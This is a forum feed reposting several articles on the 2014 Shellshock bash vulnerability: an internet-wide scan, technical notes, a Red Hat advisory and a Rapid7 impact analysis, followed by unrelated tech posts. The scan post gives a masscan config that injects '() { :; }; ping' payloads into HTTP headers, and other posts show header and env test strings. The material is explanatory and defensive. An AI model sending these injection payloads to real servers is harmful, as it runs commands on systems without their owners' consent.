Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with. Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode
  18. [h=3]Bash 'shellshock' scan of the Internet[/h] By Robert Graham I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like: target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet) http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74 http-header[Host] = () { :; }; ping -c 3 209.126.230.74 http-header[Referer] = () { :; }; ping -c 3 209.126.230.74 (Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120) Some earlier shows that this bug is widespread: A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high. Sursa: Errata Security: Bash 'shellshock' scan of the Internet
  19. We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day. Let's start with the nature of the bug. At its core, the problem caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this: $ function foo { echo "hi mom"; } $ export -f foo $ bash -c 'foo' # Spawn nested shell, call 'foo' hi mom The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here: $ foo='() { echo "hi mom"; }' bash -c 'foo' hi mom The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will be probably initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn. And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet. With that out of the way, it is important to note that the today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function def. But even with all the current patches applied, you can still do this: Cookie: () { echo "Hello world"; } ...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will be always prefixed with HTTP_*, so it's unlikely to clash with anything or be called by incident - but intuitively, it's a pretty scary outcome. In the same vein, doing this will also have an unexpected result: Cookie: () { oops If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log. All in all, the fix hinges on two risky assumptions: That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has been already proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern. If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment. What else? Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash! This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter. For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with. Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts. PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on. Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
  20. Bash specially-crafted environment variables code injection attack Posted on 2014/09/24 by Huzaifa Sidhpurwala Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal based command interpreter to many other fancy uses. In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc) Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example: ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access. Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine. Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run. Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells. Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way as described above, but doing so should be considered a bad programming practice. Red Hat has issued security advisories that fixes this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fixes this issue. We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723 Information on CentOS can be found at [CentOS] Critical update for bash released today.. Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  21. Bash-ing Into Your Network – Investigating CVE-2014-6271 Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169. Should I panic? The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process. What is vulnerable? This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash. Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today. The two most likely situations where this vulnerability will be exploited in the wild: Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell PHP applications running in CGI mode that call out to system() and where Bash is the default shell Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation. Is it as bad as Heartbleed? There has been a great deal of debate on this in the community, and we’re not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks. BUT – and that’s a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread. How can you protect yourself? The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though CVE-2014-6271 is not a complete fix, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it’s critical that they are protected behind a firewall. A big one. And test whether that firewall is secure. What can we do to help? Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help. Are Rapid7’s solutions affected? Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we’ll update this blog to keep you informed. Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
  22. [h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h] So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness. https://www.youtube.com/watch?v=igxrvISaY4E All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator." This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP. Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP. No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS). Oh and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know. So anyway the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down. I apologize for all the caps but I had a lot of feels. Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
  23. Google's latest object recognition tech can spot everything in your living room by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat. The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only vaguest of terms. Sursa: Google's latest object recognition tech can spot everything in your living room
  24. Creste numarul de posturi, continut nou pe Google, SEO. Astfel, cand vor cauta oamenii pe Google "salut", vor ajunge pe RST si vor invata cum se saluta.
  25. Un fix rapid e deja disponibil. apt-get update/yum update si ce mai vreti voi.
×
×
  • Create New...